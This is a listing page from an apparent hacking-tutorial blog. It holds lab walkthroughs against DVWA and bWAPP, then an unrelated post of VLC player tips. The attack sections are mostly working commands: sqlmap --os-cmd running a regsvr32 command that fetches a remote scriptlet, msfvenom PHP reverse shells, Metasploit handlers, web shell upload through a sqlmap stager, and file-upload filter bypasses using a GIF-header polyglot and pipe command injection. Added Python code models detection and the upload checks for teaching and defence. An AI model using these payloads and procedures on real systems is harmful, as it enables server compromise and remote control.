Showing posts with label Best of Hacking. Show all posts

Command Injection Exploitation through SQL Injection using Sqlmap in DVWA

In this article we will see how to turn a SQL injection into command injection with sqlmap: if the web server is vulnerable to SQL injection, sqlmap's --os-cmd option lets us execute arbitrary OS commands on it.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp Suite, sqlmap tool

First you need to install the DVWA lab in your XAMPP or WAMP server (read the full article here).
Now open DVWA in your browser and log in with the following credentials:
Username – admin
Password – password

Click on DVWA Security and set the website security level to low.


From the list of vulnerabilities select SQL Injection. Type the user ID 1 in the text box, but don't click Submit before setting your browser proxy: Burp Suite only sees the request if the browser is configured to send traffic through it.


Turn on Burp Suite, click Proxy in the menu bar and make sure Intercept is on. Come back and click Submit in DVWA. Burp Suite will show the Cookie and Referer headers in the intercepted request; we will use the cookie value in the sqlmap commands.


Let's enumerate all database names by passing the captured cookie to sqlmap (the security=low cookie is what keeps DVWA at the low level for sqlmap's requests):
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs


Notice in the image given below that it has dumped the names of all databases. We choose dvwa as the database for the command injection attack.


Now open another terminal for the Metasploit Framework and type msfconsole. We will use the regsvr32_applocker_bypass_server module. In the words of its description, this module simplifies the Regsvr32.exe application whitelisting bypass technique: it creates a web server that hosts a .sct file. When the provided regsvr32 command is run on a system, regsvr32 requests the .sct file and then executes the PowerShell command included in it. That command downloads and executes the specified payload (similar to the web_delivery module with PSH).
Both web requests (the .sct file and the PowerShell download-and-execute) can occur on the same port.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit

The module prints a regsvr32 one-liner that loads the hosted .sct file through scrobj.dll (the highlighted part of the output). Copy that command; we will run it on the target through sqlmap.


Now we execute that regsvr32 command on the web server through sqlmap's --os-cmd option, pasting the command from the module output as shown in the image given below. Note that regsvr32 only exists on Windows: this works because the lab web server is running under XAMPP on a Windows host.

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"


When sqlmap prompts for the web application language, type 4 for PHP, and when it asks for a writable directory type 1 for the common locations; sqlmap then uploads a small PHP stager to the web root and runs the command through it.


As soon as the command executes, come back to the Metasploit Framework and you will see that meterpreter session 1 has opened.
Type sessions -i 1
meterpreter > sysinfo
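From the defender's side, the regsvr32 command used above is noisy: a regsvr32 process with an /i: argument pointing at a URL and loading scrobj.dll is the classic signature of this bypass. The following is an added example, not part of the original article, of the detection logic one would run over process-creation telemetry (Sysmon event 1 or Windows 4688 command lines). The log lines are constructed for the example, host and user names are placeholders, and the severity labels are this example's own choice.

```python
import re

# Constructed sample process-creation records: "<timestamp> <host> <user> <command line>".
# Line 3 is the command from the walkthrough; the others are invented benign and
# near-miss cases so the classifier has something to distinguish.
SAMPLE_LOGS = [
    "2024-01-01T10:00:01 WS01 alice regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll",
    '2024-01-01T10:00:02 WS01 alice regsvr32 /u /s "C:\\Program Files\\Vendor\\plugin.dll"',
    "2024-01-01T10:00:03 WEB01 SYSTEM regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll",
    "2024-01-01T10:00:04 WS02 bob REGSVR32.EXE -s -n -u -i:https://example.test/x.sct SCROBJ.DLL",
    "2024-01-01T10:00:05 WS02 bob notepad.exe C:\\Users\\bob\\notes.txt",
    "2024-01-01T10:00:06 WS03 carol regsvr32 /n /i:C:\\temp\\local.sct scrobj.dll",
]

# regsvr32 as the image name, whether bare, with .exe, or at the end of a path.
REGSVR32 = re.compile(r"(^|\\|\s)regsvr32(\.exe)?(\s|$)", re.IGNORECASE)
# /i: or -i: whose value is a remote URL (the scriptlet is fetched over the network).
REMOTE_SCRIPTLET = re.compile(r'[/-]i:\s*"?(https?|ftp)://', re.IGNORECASE)
# scrobj.dll is the COM scriptlet handler that makes regsvr32 execute the .sct.
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)


def classify(cmdline: str) -> str:
    """Return 'high', 'medium' or 'none' for a single command line."""
    if not REGSVR32.search(cmdline):
        return "none"
    remote = bool(REMOTE_SCRIPTLET.search(cmdline))
    scrobj = bool(SCROBJ.search(cmdline))
    if remote and scrobj:
        return "high"          # remote .sct via scrobj.dll: the technique used on this page
    if remote or scrobj:
        return "medium"        # local .sct via scrobj.dll, or /i:URL without scrobj.dll
    return "none"              # ordinary DLL (un)registration


def flag_suspicious(lines):
    """Return (host, user, severity, command) for every record that is not benign."""
    hits = []
    for line in lines:
        _ts, host, user, cmd = line.split(" ", 3)
        severity = classify(cmd)
        if severity != "none":
            hits.append((host, user, severity, cmd))
    return hits


if __name__ == "__main__":
    for host, user, severity, cmd in flag_suspicious(SAMPLE_LOGS):
        print(f"[{severity}] {host} {user}: {cmd}")
```

A regsvr32 process whose parent is the web server (httpd.exe under XAMPP) is a second, independent indicator of the sqlmap path shown above; the example keys only on the command line, which is what the page shows.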

Shell uploading through SQL Injection using Sqlmap in bWAPP

You have probably used sqlmap many times to dump the database of a web server. In this tutorial I will show you how to upload a backdoor when the website is vulnerable to SQL injection.

Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp Suite, sqlmap tool

First you need to install the bWAPP lab in your XAMPP or WAMP server (read the full article here).
Let's begin!!!

Start the Apache and MySQL services in XAMPP or WAMP. Open the local host address in the browser; I am using 192.168.1.101:81/bWAPP/login.php. Enter the user and password as bee and bug respectively.


Set the security level to low, choose the bug SQL Injection (GET/Search) from the list box and click Hack.


Type any movie name, such as thor, in the text field, and then start Burp Suite in Kali Linux.


To capture the bWAPP cookie, click the Proxy tab, make sure Intercept is on, come back to bWAPP and click Search. Burp Suite will show the Cookie and Referer headers in the intercepted request; we will use the cookie value in the sqlmap command.


Now type the following command to run sqlmap and get an os-shell on the web server:

sqlmap -u "http://192.168.0.102:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D bwapp --os-shell




The above command tries to plant a file stager on the server. I want a PHP backdoor on the target, so type 4 for the PHP payload and then 1 to use the common locations as the writable directory to upload it to.


sqlmap now tries to write the file stager into "C:/xampp/htdocs/" through the SQL injection, trying its different techniques in turn; this only works when the database user is allowed to write files into a directory the web server serves, which the default XAMPP setup permits. As soon as the file is written it reports INFO the file stager has been successfully uploaded on "C:/xampp/htdocs/" and you get an os-shell on the victim PC. It also shows the URL of the stager, at which you can upload a backdoor of your own by hand; look at the highlighted URL:
http://192.168.0.102/tmpuuddt.php


I am more interested in a meterpreter shell, so let's prepare the malicious file that we will upload, using msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Copy the generated code and save it as shell.php.

Now load the Metasploit Framework by typing msfconsole and start multi/handler (the commands are given below).


Open the URL http://192.168.0.102/tmpuuddt.php in the browser. From the screenshot you can read the heading of the page, sqlmap file uploader, which lets you browse for your backdoor and uploads it into the same directory of the web server ("C:/xampp/htdocs/").

Click Browse to select your shell.php file and then click Upload.

GREAT!!! Our backdoor shell.php has been uploaded.

To execute the backdoor on the target PC, open the URL 192.168.0.102/shell.php in the browser and you will receive a reverse connection at multi/handler.


msf > use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter > sysinfo

Lovely!!! I have my meterpreter session on my kali Linux.

Hack File Upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerabilities are a major problem in web applications. They arise when an application lets users upload files without adequately checking them, so an attacker can upload a file hiding malicious code that is then executed on the server. An attacker might put a phishing page on the website or deface it.

Code running on the server may also expose internal information about the web server, and sensitive data may end up disclosed to unauthorized people.

In DVWA the page allows the user to upload an image. Depending on the security level, the server-side code checks the file before storing it in the uploads directory: at medium it checks the declared content type, and at high it checks that the file name ends in '.jpg', '.jpeg' or '.png' and that the content looks like an image.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp Suite, Metasploit Framework

Install the DVWA lab in your XAMPP or WAMP server (read the full article here).

Now open DVWA in your browser at your local IP, 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin
Password – password

Bypass Low Level Security


Click on DVWA Security and set the website security level to low.


Open a terminal in Kali Linux and create a PHP backdoor with the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Copy the highlighted code into Leafpad and save it with the PHP extension as hack.php on the desktop.


Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Now click Browse, select hack.php and click Upload, which stores the file in the uploads directory of the server.


After the upload, the page shows the path under which your file was stored. Copy the selected part and append it to the URL to execute it:
hackable/uploads/hack.php


Before opening this URL in the browser, start multi/handler in the Metasploit Framework with the commands below. While the handler is running, open the URL of the PHP file in the browser. This will give you meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo


Bypass Medium Level Security

Click on DVWA Security and set the website security level to medium.


Create the PHP backdoor the same way:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
This time save the selected code as raj.php.jpeg on the desktop. Medium security is a little different from low: the server checks the Content-Type the browser declares for the file (which the browser derives from the extension), so a file named .jpeg is sent as image/jpeg and passes the check.


Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Click Browse and select raj.php.jpeg. Now start Burp Suite and turn Intercept on under the Proxy tab. Don't forget to set the manual proxy in your browser, then click Upload.


The Intercept tab catches the POST request when you click Upload. Now change the file name raj.php.jpeg to raj.php in the intercepted request, leaving the Content-Type: image/jpeg line as it is, since that is what the medium check looks at.


Compare the request before and after the change, then click Forward to upload the PHP file into the directory.


The page shows the path under which the file was successfully stored:
hackable/uploads/raj.php


Now repeat the same steps as for low security to execute the PHP file from the URL:
192.168.1.102:81/DVWA/hackable/uploads/raj.php


Opening the URL in the browser gives you meterpreter session 2.

meterpreter > sysinfo


Bypass High Level Security

Click on DVWA Security and set the website security level to high.


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw


This time save the selected code as shell.jpeg on the desktop. High security is a little different from low and medium: it checks the file extension and also inspects the content to see whether it is an image. Therefore put the GIF header GIF89a on the first line before the PHP code and save the file as shell.jpeg; the image check sees a GIF header, while PHP still executes the code that follows it.


Repeat the upload process to browse for and upload shell.jpeg.


Again you get the directory path of the uploaded file.

This PHP file cannot be executed directly from the URL because it was uploaded with the .jpeg extension, so the server treats it as an image. To rename it, click the Command Injection option in the vulnerability menu; this vulnerability lets you copy shell.jpeg to a file with a PHP extension. The high-level filter on that page strips a pipe followed by a space (among other characters) but not a bare pipe, which is why the command below starts with |copy with no space. Type the following into the text box to copy shell.jpeg to aa.php:

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you submit the command, the PHP file is copied under the new name aa.php.


Now repeat the process to execute the PHP file from the URL:
192.168.1.102:81/DVWA/hackable/uploads/aa.php


Wonderful!! Here we get meterpreter session 3 as well.
meterpreter > sysinfo
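To make it clear why each of the three bypasses above works, here is an added Python model of the DVWA upload checks and of the high-level command-injection filter. It is an illustration written for this page, not DVWA's own PHP (which is what actually runs on the lab server); the check logic is modelled on DVWA 1.9's low/medium/high upload pages and its high-level command-injection blacklist, the looks_like_image function is a simplified stand-in for PHP's getimagesize(), and the PHP stub is a constructed placeholder for the msfvenom output.

```python
GIF_MAGIC = b"GIF89a"  # real GIF header (the walkthrough's "GIF98" is a typo)

# Constructed stand-in for the php/meterpreter payload msfvenom prints.
PHP_STUB = b"<?php /* placeholder for the msfvenom stager */ echo 'hello'; ?>"


def build_polyglot(php_code: bytes = PHP_STUB) -> bytes:
    """Prefix PHP code with a GIF header: image sniffing accepts it, PHP still runs it.

    PHP echoes the header bytes as plain text and then executes the <?php ... ?> block.
    """
    return GIF_MAGIC + b"\n" + php_code


def extension(filename: str) -> str:
    """Mimic DVWA's substr(strrpos($name, '.') + 1): the text after the LAST dot."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def looks_like_image(data: bytes) -> bool:
    """Simplified getimagesize(): accept data that starts with a known image magic."""
    return data.startswith((b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff"))


def upload_allowed(level: str, filename: str, content_type: str, data: bytes) -> bool:
    """Return True when DVWA at the given security level would store the file."""
    size_ok = len(data) < 100000
    if level == "low":
        return True  # no check at all: hack.php goes straight in
    if level == "medium":
        # Only the client-declared Content-Type and the size are checked, never the
        # name; that is why renaming raj.php.jpeg to raj.php in Burp still passes.
        return content_type in ("image/jpeg", "image/png") and size_ok
    if level == "high":
        # Extension whitelist plus image sniffing: shell.jpeg with a GIF header passes.
        return extension(filename) in ("jpg", "jpeg", "png") and size_ok and looks_like_image(data)
    raise ValueError(f"unknown level {level!r}")


# Substrings the high-level command-injection page removes from the "IP" field,
# applied in this order (modelled on DVWA 1.9 high.php). Note '| ' with a space.
HIGH_BLACKLIST = ["&", ";", "| ", "-", "$", "(", ")", "`", "||"]


def filter_high(user_input: str) -> str:
    for bad in HIGH_BLACKLIST:
        user_input = user_input.replace(bad, "")
    return user_input


def ping_command(user_input: str) -> str:
    """What the Windows server ends up running: 'ping ' followed by the filtered input."""
    return "ping " + filter_high(user_input)


UPLOADS = r"C:\xampp\htdocs\DVWA\hackable\uploads"
# The page's payload: a bare pipe, no space, so the blacklist leaves it intact.
RENAME_PAYLOAD = f"|copy {UPLOADS}\\shell.jpeg {UPLOADS}\\aa.php"


if __name__ == "__main__":
    print("medium, renamed in Burp:", upload_allowed("medium", "raj.php", "image/jpeg", PHP_STUB))
    print("high, plain PHP as .jpeg:", upload_allowed("high", "shell.jpeg", "image/jpeg", PHP_STUB))
    print("high, GIF89a polyglot:", upload_allowed("high", "shell.jpeg", "image/jpeg", build_polyglot()))
    print("server runs:", ping_command(RENAME_PAYLOAD))
```

The fix on the server side is the one none of the three levels applies: store uploads under a server-chosen name outside the document root (or in a directory where the PHP handler is disabled), and never trust the client-declared name or Content-Type.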

Best of VLC Media Player Tricks (Part 2)

How to Play Multiple Videos in VLC

Open the VLC media player.
Go to the Tools tab in the menu bar of the media player and select Preferences.


Open the Interface Settings, select Allow only one instance under Instances and save.


Now you can enqueue any number of items in the playlist while the current item keeps playing. The items will be played one after another, without gaps, in the order stored in the playlist.

How to Add Your Images and Text in VLC
Open the VLC media player.
Select Effects and Filters from the Tools tab in the menu bar of the media player.


Now go to Video Effects > Overlay.

(a) Select Add logo to add the desired image to the VLC media player. Browse for the image with the (. . .) button and adjust its transparency level and position on the screen.

(b) Select Add text, enter the text you want to show and set its position.


The image and the text appear at the selected positions while the video plays.


How to Rotate Video using VLC
Open the VLC media player.
In the menu bar, select Tools > Effects and Filters.


Now go to Video Effects > Geometry, select Transform and Rotate and adjust the angle of rotation.


The video is now rotated by the chosen angle, similar to the one shown below.



How to Extract an Audio Track from a DVD
Play the DVD in the VLC media player.


The DVD starts playing in VLC. Suppose we want to extract the audio track of Jaws 3, and this particular movie is at title 3 on the disc.


In the menu bar, select Media > Convert/Save.


Open the Disc tab, enter the title number (the number at which that particular video is located on the disc), then select Convert/Save.


Browse for the destination file, change the profile to Audio - MP3 and then select Start.


VLC starts extracting the audio track of that video.

AUTHOR - This article is written by NUPUR KUMARI, who is pursuing a Bachelor's degree in Information Technology from Bhopal. She is interested in web security.